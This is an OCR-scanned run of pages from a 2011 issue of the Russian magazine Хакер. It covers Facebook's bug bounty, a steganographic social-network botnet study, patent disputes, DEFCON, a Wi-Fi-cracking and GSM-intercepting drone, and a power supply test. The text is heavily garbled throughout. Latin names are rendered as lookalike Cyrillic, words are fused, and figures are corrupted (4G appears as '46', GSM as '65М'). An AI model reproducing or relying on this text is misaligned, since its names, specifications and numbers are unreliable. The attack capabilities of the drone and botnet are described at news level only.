не называются, цена, та к сказать, договорная. Основное требование к уязви- 
мостям — возможность с их помощью изменить персональные данные поль- 
зователей РасеЬоок ил и же нарушить настройки безопасности системы. Как 
правило, это касаетсяХВВ-уязвимостей, втом числеуязвимости С5РР/Х5РР, и 
внедрения произвольного программного кода. Разумеется, программа выплат не 
распространяется на уязвимости в сторонних приложениях, используемых или 
использующих РасеЬоок, а также на уязвимости, вызывающие отказ от обслу- 
живания или рассылку спама с применением социальной инженерии. Сообщив 
о найденной дырке, следует дать сотрудникам РасеЬоок время для исправления 
проблемы и не торопиться обнародовать найденные недостатки. Ну и еще для по- 
лучения денег нужно проживать в стране, не попадающей под юрисдикцию США. 
Сравнения ради напомню, что М 02 ІІ Іа сейчас готова за платить за уязвимость 3 
тыс. долларов, а боодіе — уже 3133,7. «Корпорация добра», кстати, уже потра- 
тила на «оплату багов» более 300 000 долларов. Что-то жадничают Цукерберг и 
сотоварищи. 



ФЛЕШКИ — НАСТ0ЯЩЕЕЗЛ0 ДЛЯ КОРПОРАЦИЙ 



40% ОРГАНИЗАЦИЙ ИМЕЮТ 
В ОБОРОТЕ ОКОЛО 50 000 115В- 
УСТРОЙСТВ, 20 %— ОКОЛО 
100 000 УСТРОЙСТВ. ПОТЕРЯ 
ФЛЕШКИ С ВАЖНЫМИ ДАН- 
НЫМИ ЧРЕВАТА УЩЕРБОМ 
ПОЧТИ В 2,5 МЛН ДОЛЛАРОВ! 



А ЕСЛИ 

СТЕГАНОГРАФИЯ? 



ИНТЕРЕСНОЕ ИССЛЕДОВАНИЕ 
ОБУХИЩРЕНИЯХВ БОТНЕТАХ 

П руппа программистов из Института информа- 
ционныхтехнологий г. Индрапрастха (Индия) и 
Университета Иллинойса (США) опубликовала по 
а д ресѵ а гхіѵ.ога/а 65/1107.2031 результаты любопытного 
исследования, доказывающего, что создание стеганогра- 
фического ботнета, передающего информацию через соци- 
альные сети, это довольно перспективная и занимательная 
штука. На всякий случай скажу, что стеганография — это 
наука о скрытой передаче информации путем сохранения в 
тайне самого факта передачи. Исследователи рассматри- 
ваюттеоретическую программу З^едоЬоЦ которая, попав 
на компьютер пользователя (обычным путем — например, 
кликом по нехорошей ссылке), ведет себя не совсем обычно. 
Вместо передачи конфиденциальных данных напрямую, по 
старинке, 5*едоЬо1: выжидает момент, когда жертва начнет 
загружать в Сеть какие-либо изображения, и зашифровы- 
ваетукра денные пароли и номера банковских карт в графи- 
ческие файлы с помощью стеганографии! К примеру, одна 
залитая в РасеЬоок ЗРЕ6 -картинка с разрешением 720x720 
пикселов (максимальный на РасеЬоок размер) вмещает до 
50 Кб информации без видимых последствий для качества 
изображения. Когда такие зараженные картинки просмо- 
трит пользователь другого компьютера, инфицированного 
ВііедоЬоСом, информация перезапишется в его фото. А ведь 
в том же РасеЬоок'е для этого достаточно л ишь открыть про- 
файл другого юзера, так как в соцсети работает предвари- 
тельная загрузка изображений. 

Исследователи просчитали и даже смоделировали 
распространение информации через 5*едоЬо1: на примере 
фотохостинга РІіскг. Они эмулировали сеть из 7200 связан- 
ныхдругсдругом аккаунтов, при этом воспроизведя частоту 
выкладывания фотографий. Спрятанные в изображениях 
данные попали в руки хозяев гипотетического ботнета 
очень быстро. То есть это работает. 

Кроме того, все это можно использовать и в обратном на- 
правлении. Хозяева такого ботнета могут вбросить в интер- 
нет картинки с зашифрованным в них исполняемым кодом, и 
очень скоро этот код попадет на зараженные компы, раздав 
им соответствующие «приказы». 




Украденные Команды ► Малварь 

данные 



ХАКЕР 10/153/2011 



013 




МЕ6АЫЕѴѴЗ 



РОССИЙСКАЯ КОМАНДАВПЕРВЫЕПОПАЛАВФИНАЛОЕРСОЫ СТР. Подробности на стр. 52 



ПАТЕНТНЫЕ ВОЙНЫ 



ОЕЕСОІЧ 19 



ПРОТИВОСТОЯНИЕ СОООІ.Е И АРРІ.Е/МІСК050РТ НАБИРАЕТ ОБОРОТЫ 




П ы наверняка слышал о том, что в последние месяцы 
вокругмобильныхустройств на платформе АпсІгоісІ 
и ихпроизводителей бурлятнешуточные страсти. 
Стоитхотя бы вспомнитьсудебные иски компании Місгозок 
кбатзипд'уи Вагпез& ІЧоЫе, иски Арріе к НТС'у и М оііогоіа 
и та к да л ее. В связи с этим в СМИ уже давно заговорили о 
настоящих патентных войнах (такая тактика, в общем-то, 
не нова], однако теперь и в боодіе открыто говорят о том же 
самом. Главный юрист боодіе Дэвид Драммонд в офици- 
альном блоге компании заявил, что Місгозок, Арріе и Огасіе 
организовали против АпсІгоісІ 'а целую кампанию, целью 
которой является взвинтить цены на устройства на этой 
платформе. Какты понимаешь, основным оружием, которое 
конкуренты используют против АпсІгоісІ 'а, являются патен- 
ты. Суть сводится ктому, чтобы уличить боодіе в нарушении 
этих самых патентов и заставить производителей устройств 
на АпсІгоісІ 'е выплачивать отчисления патентодержателям. 

В своем посте Драммонд особо подчеркнул, что боодіе 
намерена защищать платформу АпсІгоісІ. Действительно, 
пора бы уже, ведь компания Арріе уже добилась временного 
судебного запрета на продажи планшета батзипд баІахуТаЬ 
10.1 на территории стран Евросоюза (правда, его к моменту 
публикации уже снял и). 




1000 

патентов недавно 

приобрелакомпания 

боодіеукомпании 

ІВМ,причемдалеко 

невсеизнихсоот- 

ветствуютпрофилю 

компании. Простое 

нашивременаукого 

больше патентов, тот 

и круче 



КРУПНЕЙШАЯ В МИРЕХАК-КОНФЕРЕНЦИЯ 
ПРОШЛА В ВЕГАСЕ 

же традиционно конец августа ознаменовался про- 
шедшим в Лас-Вегасе ОЕРСОІМ. Если ты не знаешь, 
что это такое, то журнал, должнобыть, попал ктебе 
в руки по ошибке. Конференция ежегодно проводится в 
Вегасе и собираеттысячи человек со всего мира. Что забыли 
там все эти люди? Они приезжают на одно из крупнейших 
хакерских собраний на нашем шарике, где помимо докладов 
ежегодно проходят и самые знаменитые хакерские (ѵѵЫіебаІ:] 
соревнования СаркгеТНе Над. Что примечательно, в этом 
годупрограмма конференции пополниласькурсами йекоп 
Кісіз, рассчитанными на детей от8до Іблет, которыехотят 
узнать, как стать нравственными взломщиками. Детишек 
учили открывать замки, «взламывать боодіе» и использо- 
вать шифрованное общение. 

Ноперейдем квзрослым. Описыватьдоклады и пре- 
зентации не станем, к ним ты можешь самостоятельно при- 
общиться по адресу сіекоп.ога . А вот самое прикольное собы- 
тие конфы назовем. Многострадальный Аарон Барр, бывший 
генеральный директор НВбагу, присутствовал на конферен- 
ции полутайно, та к как получи л письменное уведомление от 
адвокатов НВбагу, в котором сообщалось, чтоони намерены 
получить судебный запретна его выступление. В итоге Барр 
не участвовал в запланированной панели «ѴѴИоеѵегЛдЫз 
топзіегз: сопкопііпд Аагоп Вагг, АпопутоизапсІ оигзеіѵез» 
и дискуссию о Шібес'е, Апопутоиз'е, а также об отношении 
а мери канских военных к кибервойне только слушал. 





СЛУЧИЛОСЬ НЕВЕРОЯТНОЕ И 
УДИВИТЕЛЬНОЕ — компания 
АсІоЬе,чей РІазИ уже давно 
стал неотъемлемой частью 
Сети, наконец-то поддержа- 
лаальтернативноеПОдля 
создания веб-анимациис 
помощью открытыхстан- 
дартов, включая НТМБ5, 
С553 и ^ѵаЗсгірГ Бета- 
версия программы АсіоЬе 
Есідеуже вышла в свет, рас- 
пространяется бесплатно, 
и ее уже можно загрузить с 
сайта АсІоЬеІ_аЬ5. 






УСПЕШНОГО И ИЗВЕСТНОГО 

хакера-самоучку наняла на 
работу компания Батзипд. 
Стив «Суаподеп» Кондик 
известен каксоздатель про- 
шивки СуаподепМосі. 



ОФИЦИАЛЬНАЯ БИО- 
ГРАФИЯ главы Арріе Стива 
Джобса выйдетраньше, 
чем планировалось,— 
вноябре2011 г.Книга 
получит название «Зіеѵе 
-ІоЬзгАВіодгарИу». 
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МЕ6АЫЕѴѴ5 



ПЕРВЫЙ ТРОЯН ДЛЯ НОВОГО АМ0К0Ш'А2.3(6іпдегМа5іег) обнаружили в китайском АпсІгоісІ Магкеіріасе. 



ХАКЕРСКИЙ БЕСПИЛОТНИК 



КАК ПОСТРОИТЬ ДРОН И С ЕГО ПОМОЩЬЮ ВЗЛОМАТЬТО, 

ЧТО НЕДОСТУПНО СЗЕМЛИ 

а конференции ВІаскНаТ исследователи МайкТэсси и Ричард Перкинс 
представили вторую версию беспилотного аппарата ѴѴігеІеззАегіаІ 
ЗигѵеіІІапсе РІаЛогт (беспроводной платформы воздушного наблюде- 
ния). Напомним, что их первый дрон, о котором мы писали год назад, мог облетать 
территорию по заданному маршруту и собирать информацию о ѴѴіРі- сетях. За 
основутогда была взята модель МиГ-23, к которой добавили комп Ѵіа Еріа Рісо ИХ 
РС (500 МГцѴіа С7, 1 Гб РАМ с ВаскТгаск4на борту) и наладили систему автома- 
тического пилотирования Агб и РіІоТ. Система поддерживала связь с наземной 
базовой станцией в режиме реального времени посредством РРР-оѵег-55Н- 
тоннеля. Со второй версий беспилотника Тэсси и Перкинс зашли дальше. Взяв за 
основу остатки военного беспилотного самолета, они построили модель весом 
14 фунтов (6,35 кг) и длиной в 6 футов (183 см). Ее оснастили Ѵіа Еріа РХ5000Е6 Рісо 
ІТХРС (500 МГцѴіа С7, 1 Гб РАМ), но теперь уже под у правлением І_іпих ВаскТгаскб. 
Также в комплекте второй версии вошла программа для брутфорса со словарем 
в 340 млн слов. Благодаря этому ѴѴАЗР стал способен не только использовать от- 
крытые хотспоты, ной выполнять ряд действ ий для взлома за крытых ѴѴіГі-сетей. 
Дрон связывается со станцией посредством 46-донгла, и та, в свою очередь, 
осуществляет контроль над моделью при помощи боодіе ЕагТН и открытого ПО 
для автопилота. Та же базовая станция собирает данные, полученные отдрона, 
и через ѴРЫ перенаправляет их на сервер, который способен обработать более 
сложные данные и осуществить более сложные вычисления. Беспилотник также 
научился работать в качестве мобильной 65М -станции. Совершенно неза- 
метно для абонента он способен принять на себя 65М -соединение и с помощью 
46 модуля п ерена править его по ѴоІР. Таким образом, звонок не оборвется и его 
ста нет возможно за писать. Разговоры и 5М 5 фиксируются во встроенной памяти 
аппарата, чей объем равен 32 Гб. 

Немаловажный факт — самолет работает от электрического двигателя, та к 
чтоуслышатьего почти невозможноуже на расстоянии порядка 15 м. И хотя пра- 
вила Федерального авиационного агентства запрещают полеты таких устройств 
на высоте более 400 футов (122 м), дрон, построенный Тэсси и Перкинсом, может 
подниматься на высоту более 20 000 футов (6096 м). 

Применить та кой аппарат можно очень по-разному: во благо и не очень. Так, 
он способен осуществлять операции по пассивному прослушиванию беспровод- 
ных сетей и их взлому, спуфингу сотовых вышек, следить за сотовыми телефо- 
нами и перехватыватьтелефонные разговоры, эксфильтрироватьданные или 
просто осуществлять видеонаблюдение. 

Официальный сайт проекта по-прежнему находится по адресу гаЬЬіЫіоІе.огд . 
Там ты найдешь множество фотографий, видео, презентации с ВІаск Наі: 201 1 и 
ОЕГСОЫ 19, а также подробный раздел о том, как собрать та кую же штуковину свои- 
ми руками. По словам Перкинса, «чтобы создатьтакую модель, не нужна научная 
степень». Крометого, все комплектующие и детали можносвободно приобрести в 
магазине. 





На постройку, тестирование иусовершенствованиеэтогоаппаратау 
Перкинса и Тэсси ушло 1300 часов. Денежные вложения разработчиков 
были не так велики, как можно подумать: они составили 6190 долларов 




Х501М00ТЖІМ5Т0МХ5 

Этим летом ѴѴіпзІопХБ представил эксклю- 
зивную площадкуХБоипсІВаг на леген- 
дарном британском орепаіг-фестивале 
ѴѴіпвІоп СІоЬаІ баІЬегіпд Ргеесіот Мизіс, 
который состоялся 16 июля 2011 года под 
Санкт-Петербургом. Более 30 000 человек 
собрались на данное мероприятие, чтобы 
услышатьсеты отлучшихдиджеев мира. 
ХБоипсІВаг находился в самом эпицентре 
фестиваля. Внутри двухэтажного объекта, 
выполненного в эстетике настоящего ночного 



клуба с модным дизайном и интерактивным 
контентом, располагались сіііііоиі-зона, бар- 
ная стойка с необычным коктейльным меню и 
инновационное пространство Зй-тарріпд, где 
каждый могпопробоватьсебя вроли йѴЭ. 

После остановки на ѴѴіпзІоп СІоЬаІ баШеппд 
Ргеесіот МизісвечеринкиХБоипсІ возвращаются 
на танцполы лучших российских клубов. В новом 
клубном сезонеХБоипсІ представиткиловатты 
актуальной музыки и выступления топовых 
артистов и диджеев, за расписанием которых 
можно следить на сайте іпвІопхБ.ги . 





МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 






ГЕМШМ 



Алексей Горбунов 



ПИТАЙТЕСЬ 

ПРАВИЛЬНО! 

ТЕСТИРОВАНИЕ БЛОКОВ ПИТАНИЯ 
СТАНДАРТА80 РШ5 60Ш 



Что нужно для сборки продвинутого игрового компьютера? Качественная мате- 
ринская плата, современный процессор, побольше памяти, видеокарта помощнее, 
быстрый и вместительный жесткий диск? Несомненно, все это должно бытьупако- 
вано в красивый и просторный корпус. Но важно не забывать, что главнейший ком- 
понент будущей системы — это блок питания. Именно он будет снабжать энергией 
твоего игрового «монстра». Мощные конфигурации отличаются повышенными 
требованиями к питанию, особенно это касается прожорливых видеокарт, а также 
связок БЫ и СгоззРігеХ. Отсюда вывод: подходить к выбору БП надо с умом. 



МЕТОДИКАТЕСТИРОВАНИЯ 

Всеиспытуемыеблоки питания прошлитесты на 
стенде 0-РАМ ОВЗ-2200 откомпании РЗР. Кон- 
структивно он состоит из колодок с разъемами, 
куда подключаются кабели отБП, нагрузочного 
блока, охлаждаемого при помощи вентиляторов, 
переключателей для выставления силытока по 
основным линиям и панели индикации напряже- 
ния. При помощи да иного стенда можно нагрузить 
блокпитания мощностью до850 Вт. 

Тесты проводились по следующей схеме. 
Переключателями устанавливаем для лин ий +12Ѵ 
потребляемую мощность, равную 100 Вт. Далее 
последовательно повышаем нагрузку на линиях 
+3,ЗѴи+5Ѵсшагом20Вт. На панели индикации 



наблюдаем реальные значения напряжений по ли- 
ниям, которые и записываем. Затем увеличиваем 
потребл яемую мощность на линиях +12Ѵ до 200 Вт и 
повторяем процессзаново. Пределами ограниче- 
ний являются значения максимальной комбиниро- 
ванной на грузки у каждого из блоков питания. 
Результаты испытаний — это процентные откло- 
нения напряжения по каждой из основных линий: 
+3,ЗѴ, +5Ѵ, +12Ѵ. Чем меньше разница между 
замеренным и идеальным значениями напряже- 
ния, тем лучше: значит, блокпитания эффективно 
распределяет нагрузку и не проседает. Также оце- 
ни вались: комплект поставки, оснащение теми 
или иными разъемами для подключения, уровень 
шума и нагрев корпуса блока питания. 



Сооіег МаБІегЗіІепІ Рго боШ 700ѴѴ 

Согзаіг РгоГезБІопаІ Зегіез Ооісі АХ750 

ЕМЕНМАХМООЦ87+800ѴѴ 

РБРАІШМбОІЛШО 

РБРАІШМООІЛШО 

ТНегтаИаке ТоидИроѵѵег6гапсІ750ѴѴ 
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Питайтесь правильно! 




го^еззіопаІБегіезбоІсІ АХ750 несколько выбивается из нашей 
пафосной компании своим строгим, аскетичным видом. Этот 
блок питания интересен прежде всего тем, что он полностью 
модульный: проводов из него не выходитвообще никаких, только разъ- 
емы. АХ750 идет в комплекте с набором кабелей (заботливо укутанных 
в чехол на липучке], инструкцией, винтиками и стяжками для проводов. 
Частькабелей (БАТАи Моіех] сделана плоскими, какиу предыдущего 
БП отСооІег Мазіег. В процессе подключения кабелей мы столкнулись 
с проблемой — полное отсутствие каких-либо подписей к разъемам 
на корпусе БП или хотя бы цветового их разделения. АХ750 способен 
выдать 750 Вт мощности и теоретически обеспечить ток в 62 А (744 Вт] 
по линии +12Ѵ. С охлаждением здесь справляется 120 мм вентилятор. 
Результаты тестов АХ750 говорят сами за себя — показатели отличные. 
Отклонения в пределах 2% по всем линиям. 

Вентилятор АХ750 не вращается, пока загрузка БП составляет 
меньше 20%, при нагрузке от 20 до 50% он работает в тихом режиме 
и только ближе к 100% начинает раскручиваться, но услышать его 
проблематично. 



С0К5АІК РК0РЕ55І0ЫАІ. 
5ЕКІЕ5 601.0 АХ750 



СООІ.ЕК МА5ТЕК5ИЕЫТ 
РК060Ю700ѴѴ 

ач и наем с блока питания Зііепі Ргобоіб 700ѴѴ от компании 
СооІегМаз1:ег. Принадлежность к золотому сертификату 
80 РШ5. Блокпитания модульный и оснащен встроенным 
хвостом из проводов с разъемами 20+4-пин для материнской платы, 
4+4-пин для процессора и 6-пин для видеокарты. Комплект поставки 
включает все остальные кабели для питания компонентов системы, 
упакованные в аккуратный чехол, несколько стяжек-липучек для про- 
водов, крепежные винты, инструкцию и декоративную наклейку. 
Мощность Бііепі: Ргобоіб 700ѴѴ составляет 700 Вт, заявленный макси- 
мальный ток по линии +12Ѵ может достигать 56 А (672 Вт]. Охлаждается 
блокпитания при помощи 120 мм вентилятора с автоматическим управ- 
лением. По результатам испытаний 5іІеп* Ргобоіб 700ѴѴ продемонстри- 
ровал полную стабильность во всех режимах нагрузки. 

Максимальные отклонен ия показателей по линии +3,ЗѴ достигли 
лишь 1%, а по каналам +12Ѵ и +5Ѵуложилисьв 2%. Все время, пока шли 
тесты, шум отвентилятора блока питания оставалсяумеренным, даже 
низким. Сам БП на ощупь был чуть теплым, и не бол ее того. 



ВЕНТИЛЯТОР ВООБЩЕ НЕ 
ВРАЩАЕТСЯ, ПОКА ЗАГРУЗКА БП 
СОСТАВЛЯЕТ МЕНЬШЕ 20% 
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РЕККІІМ 



ЕЫЕКМАХМООЮТ+вООѴѴ 



М 



ООІІ87+ 800ѴѴ — один из лучших блоков питания ЕЫЕРМАХ. Корпус 
выполнен из шероховатого металла и оборудован вентилято- 
ром с«золотыми» лопастями. Модель, разумеется, модульная. 
Комплектация объемная: инструкция, кабели и сумочка кним, крепежные 
винты, хомуты на липучке, стикер, а также интересная штука под названием 
СогсЮиагсІ, которая закрепляется снаружи блока питания и защелкивается 
на сетевом шнуре, удерживая его от вы падения из разъема БП.У МООІІ87+ 
800ѴѴ в наличии 4 виртуальных линии +12Ѵ, по 30 А на каждую, при этом 
суммарная нагрузка по ним заявлена в 792 Вт. Перейдем к тестам. Здесь все 
замечательно: отклонения в 1-2%, и не бол ее того. Отдельно обратим вни- 
мание на показатели линии +12Ѵ, которые большую часть времени остаются 
и вовсе идеальными. При оценке уровня шума исключительно положитель- 
ные впечатления остались от 140 мм вентилятора, который работаеттихо 
и эффективно. Отметим, что после выключения системы вентилятор еще 
какое-то время работает, ограждая компоненты БП отрезкого перепада 
температур. 





Р5РАШММ60Ю600 



л ок питан ия у па кован в черную с золотом коробку, сам он 
оформлен втомже цветовом стиле. Комплектпоставки состоит 
из: инструкции, сетевого шнура, стяжекдля проводов, крепеж- 
ных винтов да наклейки Р5Р. Примечательны скромные габариты БП: 
в длину он достигает всего лишь 150 мм и легко помещается в стан- 
дартном корпусе, никому не мешая. Мощность Р5РАІІРІІМ 60 Ю 600, 
как видно из названия, равна 600 Вт, заявленный КПД достигает 90 %, 
чтосоответствуетсертификату80 РШЗбоІсІ. Каждая из4виртуальных 
линий +12Ѵобеспечиваеттокдо 18 А. 

По результатам тестов блок питания показал себя на достойном 
уровне. С одной стороны, отклонения по линиям у него более явные, не- 
жели у остальных испытуемых, особенно по каналу +5 V, где он и доходят 
до 4%. С другой — все значения укладываются в допустимые рамки. 

Чего, правда, не скажешь об уровне шума. При сильной загрузке гул 
вентилятора отчетливо слышен. Зато тепловые показатели в норме, 
перегрева не наблюдалось. 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 




Мощность: 700 Вт 

Заявленный КПД: не менее 90% 

Количестволиний+12Ѵ единаялиния 

Максимальныетокиполиниям +3,ЗѴ-22А,+5Ѵ-25А,+12Ѵ-56А, 

-12Ѵ-0,ЗА,+5Ѵ5Ь-3,5А 

Максимальная комбинированная нагрузка +3,ЗѴ&+5Ѵ-150 Вт,+12Ѵ-672Вт 



Тип РРС 
Охлаждение 
Габариты 
Вес 



активный 
вентилятор120мм 
160x150x86мм 
3,3 кг 



750 Вт 

не менее 90% 
единаялиния 

+3,ЗѴ - 25 А, +5 Ѵ-25 А, +1 2 V- 62 А, 

-12Ѵ-0,5А,+5Ѵ5Ь-ЗА 

+3,ЗѴ & +5 V - 1 25 Вт, +1 2Ѵ -744 Вт 

активный 
вентилятор120мм 
160x150x86мм 
3,3 кг 



800 Вт 
до 93% 

4 

+3,ЗѴ-24А,+5Ѵ-24А,+12Ѵ1-Ѵ4-30А, 

-12Ѵ-0,5А,+5Ѵ5Ь-ЗА 

+3,ЗѴ & +5 V - 1 20 Вт, +1 2Ѵ1 ... 

&+12Ѵ4 -792 Вт 

активный 

вентилятор 140 мм 

175x150x86мм 

2,9 кг 
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Питайтесь правильно! 




НегтЫакеТоидНроѵѵегбгапсІ 750ѴѴ упа кован в матовый черный 
корпус с алой каймой, проходящей по периметру блока, — скромно 
и изящно. По габаритам это самый большой БП из наших испытуе- 
мых — аж 180 мм длины! КомплектацияуТоидНроѵѵегбгапсІ 750ѴѴ, пожалуй, 
самая богатая: бархатная сумочка, в которой находится сам БП; мешочек 
чуть поменьше — для аксессуаров; сумка на липучке — для проводов; кабе- 
ли, стяжки-л и пучки в достатке, пластиковые зажимы в количестве 4 штук, 
инструкция, винтики, а также резиновые накладки на заднюю стен куБП. 
ТоидНроѵѵегбгапсІ 750ѴѴ — модель с модульным подключением. Заявлен- 
ная мощность — 750 Вт, теоретический пик по единой линии +12Ѵ — 720 Вт. 
Остужает БП 140-миллиметровый вентилятор на двух шариковых подшип- 
никах и со слегка измененной формой лопастей, благодаря чему обещано 
снижение уровня шума. По итогам тестов выяснилось, что обещание было 
выполнено: работаетТоидброѵѵегбгапсІ 750ѴѴтише воды, нижетравы, 
оставаясь чуть теплым. Показатели — отличные, отклонения не более 2% в 
любом из режимов, а по лин ии +5Ѵ — таки вовсе идеальные. 



Р5РАШШМ60І.0700 



азница между АІІПІІМ 60 Ю 700 и предыдущей моделью Р5Р из 
наш их тестов минимальна и заключается в мощности, числе 
разъемовдля подключенияустройств, ну и в цене, разумеется. 

В остальном они братья-близнецы что по внешнему виду, что по разме- 
рам (две самые компактные модели в нашем тесте], что по содержимому 
зол отисто-черной упа ковки. АІІПІІМ 60 Ю 700 — блок питания стандартно- 
го типа с возможностью подключения пары видеокарте питанием по двум 
разъемам 6+2 ріп, семи устройств с коннектором 5АТА и четырех с Моіех, 
одного Р00. Заявленная мощность БП — 700 Вт, токи по линиям +12Ѵте 
же, что и у младшей модели, — 18 А, зато по линиям +3,ЗѴи +5Ѵони вышей 
достигают 28 А. За охлаждение отвечает 120 мм вентилятор на гидродина- 
мическом подшипнике. Тесты АІІПІІМ 60 Ю 700 прошел уверенно, показав 
чутьлучшие результаты, нежели его младший собрат. Отклонения не 
более 3% — все в предел ах нормы. То же самое можно сказать и про нагрев: 
теплый корпус БП при максимальной нагрузке — это хорошо. Другоедело, 
какой ценой это дается: вентилятор все-таки шумноват. 



ТНЕКМАНАКЕ 

ТОІІ6НРОѴѴЕК6РА№750ѴѴ 




600 Вт 
90% 

4 

+3,ЗѴ-24А,+5Ѵ- 24А,+1 2Ѵ1 -Ѵ4- 1 8А, 
-12Ѵ-0,5А,+5Ѵ5Ь-3,5А 
+3 # ЗѴ & +5Ѵ -1 40 Вт, +1 2Ѵ1 ... 
&+12Ѵ4-540 Вт 
активный 
вентилятор120мм 
150x140x86мм 
1,9 кг 



700 Вт 
90% 

4 

+3,ЗѴ-28А,+5Ѵ-28 А,+1 2Ѵ1 -Ѵ4-1 8А, 
-12Ѵ-0,5А,+5Ѵ5Ь-3,5А 
+3,ЗѴ&+5Ѵ-160 Вт,+12Ѵ1... 
&+12Ѵ4- 672 Вт 
активный 
вентилятор 120мм 
150x140x86мм 
1,9 кг 



750 Вт 

до 92% 

единаялиния 

+3,ЗѴ-25А,+5Ѵ-25А,+12Ѵ-60А, 

-12Ѵ-0,8А,+5Ѵ5Ь-ЗА 

+3,ЗѴ&+5Ѵ- 150 Вт, 

+12Ѵ-720 Вт 

активный 

вентилятор 140 мм 

180x150x86мм 

2,5 кг 



ЛУЧШИЕ ИЗ РАВНЫХ 

Посовокупности параметров лучшая модель — это ЕЫЕНМАХ 
МООІІ87+800ѴѴ. В его пользу говорят отличный комплект по- 
ставки, высокий запас по мощности, россыпь разъемов для 
подключения, великолепные результаты испытаний итихая 
работа. Правда, стоит он как скромный офисный ПК, да и кор- 
пуса потребует немаленького, но тутуж ничего не поделать. 
Такие модели — удел энтузиастов, у которых и с деньга ми, и 
с дорогим и корпусами все в порядке. Если же бюджет не по- 
зволяет больших трат, но есть потреби ость в качествен ном БП 
с сертификатом 80 РШ56оІсІ,то стоит обратить внимание на 
Р5РР5РАІІНІІМ 60Ю700. Модульности нет, зато есть честные 
700 Вт, выполнение всех зада иных нормативов по напряжени- 
ям, компактные размеры и очень приятная цена. ІЬИ 
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РЕККІІМ 



Александр Михеев 




|Г иМГА ЭЛЕКТРОННАЯ КНИГА 
ІЖІ ШШШШ #%\А/ЕХЕЕЕ.ВООКТ5002 ^ 

РАЗВЛЕЧЕНИИ 





Экран: 5 дюймов, 800x480 точек, 
сенсорный, цветной, 1_Е0-подсветка 
Встроенная память: 4 Гб 
Карты памяти: до 32 Гб тісгоЗО 
Форматы текста: ТХТ, РйВ, НТМЦ 
РйР, РВ2, ЕРІІВ 

Форматы музыки: МРЗ, ѴѴМА, РЕАС, ААС 
Форматы изображений: ЗРЕВ, ВМР, 6ІР 
Форматы видео: ѴѴМѴ, РМ, АѴІ, РМѴВ, 
36Р, РІ_Ѵ, МР4, ОАТ, ѴОВ, МР6, МРЕВ, 
МКѴ,МОѴ 

Интерфейсы: 115В 2.0, аисііо-ои* 
Дополнительно: РМ-радио, диктофон, 
акселерометр 
Габариты: 148x90x11 мм 
Вес: 285 г 

Комплектация: стилус, 
кабелыпіпі-ІІ5В> 115В, инструкция 



С каждым годом количество карманных и не совсем устройств, способных 
развлечь человека в дороге, растет прямо на глазах. А ведь когда-то с собой 
брали разве что обычную бумажную книгу или какой-нибудь «тетрис» да кас- 
сетный плеер. Теперьтехника шагнула дальше: в поездке вы можете иметь 
под рукой хоть тысячу книг, несколько сотен часов музыки, РМ-радио, какие- 
нибудь незамысловатые игры и несколько кинофильмов — и всё это водном 
устройстве. Все вышеперечисленные возможности относятся и к новинке 
ѴѴЕХІ_ЕР.ВООКТ5002, о которой сегодня и пойдет разговор. 



ВОЛШЕБСТВО В КАРМАНЕ 

Инженерам из ѴѴЕХІ.ЕР уда л ось воплотить в жизнь 
очень интересную за думку — многоцелевой «ком- 
байн» и практически даром. Но обо всем по поряд- 
ку. Та к называемая электронная книга внешне вы- 
глядиткаки многие ее собратья. Корпуссделан из 
пластика, на нем расположены всеготри кнопки. 
Дисплей ѴѴЕХІ_ЕР.ВООКТ5002 не только цветной, 
ной сенсорный. Налицо большое преимущество 
перед «читалками»на основее-іпк: возможность 
смотретьфотографии и даже видео в неплохом 
качестве. Однако сказывается цена устройства: 
изображение несколько«шумновато». Окупается 
это большим числом поддерживаемых форматов 
видео, которыеможносмотретьбез предвари- 
тельного конвертирован ия. Также к мульти медий- 
ным возможностям относится наличие РМ-радио 
и плеера. Последний поддерживаетнетолько 
широко используемый формат МРЗ, но и даже 
РЕАС иАСС. Конечно, музыки и видеобылобытес- 
новатона встроенной памяти (4 Гб], но ее можно 
расширитьза счеткарточки тісгоБО. 

КНИГАС АКСЕЛЕРОМЕТРОМ 

Есть и менее заметные, но всё равно полезные в 
повседневной жизни функции. К ним мы отнесли 
диктофон, который нет-нетда и пригодится 
однажды. Блокнот для различныхзаметок, 
календарь-ежедневник, секундомер и, наконец, 
калькулятор. В случае, если книги и фильмы 
закончатся раньше, чем очередь, в которой вам 
не посчастливилось стоять, то на помощь придут 
незамысловатые встроенные игрушки. Одна из 
них — знакомый всем 



«САПЕР» 

Управление книгой проще некуда: «рабочий стол» 
предоставляетдоступ сразу ко всем возможным 
функциям, поэтому потерятьчто-то в глубинах 
меню невозможно. Еще более комфортным 
использованиеѴѴЕХЕЕП.ВООКТ5002 делает 
акселерометр, позволяющий автоматически 
переворачивать изображение в нужную сторону. 
Сенсорный дисплей довольно отзывчивый, но 
кудаудобнееуправлятьустройством с помощью 
идущего в комплекте стилуса, чем пальцами. 
Интерфейсовтолькодва: тіпі-ЕІ5В и выходдля 
наушников. 

выводы 

ѴѴЕХЕЕР.ВООКТ5002 из разряда устройств, 
точную принадлежностькоторыхктомуили иному 
классу определитьтрудно. Ведьэто и «читалка», и 
аудио-, и видеоплеер. Несчитая, конечно, других 
полезных функций. Для гордого звания «полный 
фарш» не хватаеттолькоѴѴіРі -модуля и открывал- 
ки для пива. Стоит отметить, что если главное для 
вас — литература, а остальныефункции нужны 
гораздо реже, то лучше брать электронную кн игу 
на основее-іпк, та к как от чтения сЕСО-дисплея 
глаза будутуставать намного быстрее. Но если вы 
ищете именно некий карманный мультимедийный 
«комбайн» по демократичной цене,то ѴѴЕХБЕР. 
ВООКТ5002 подойдет как нельзя лучше. 

плюсы 

• Низкая цена. 

• Цветнойсенсорныйдисплей. 

• Воспроизведение видео множества форматов. 
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31 страница журнала на одной полосе. 
Тизер нескольких статей из этого номера. 



Ргеѵіехл/ 



ВЗЛОМ 



58 



КАКЗАКРЫВАЮТ БОТНЕТЫ 

Естьлиуодной, пускайдажеочень 
большой, ІТ-компании хотя бы один шанс 
справиться с задачей, которую не могут 
решить правоохранительные органы и 
спецслужбы разныхстран мира? Ботнеты 
ѴѴаІесІас, ПііБІоск, СогеРІооб и дальше 
продолжали бы рассылать миллионы 
спам-сообщений и ддосить ресурсы, 
если бы их деятельности не помешали 
сотрудники МІСГ 050 Й. Интересно, что для 
этого использовались не только чисто 
технические способы, но и юридиче- 
ские уловки, о которых не могли знать 
киберпреступники. Какудал ось получить 
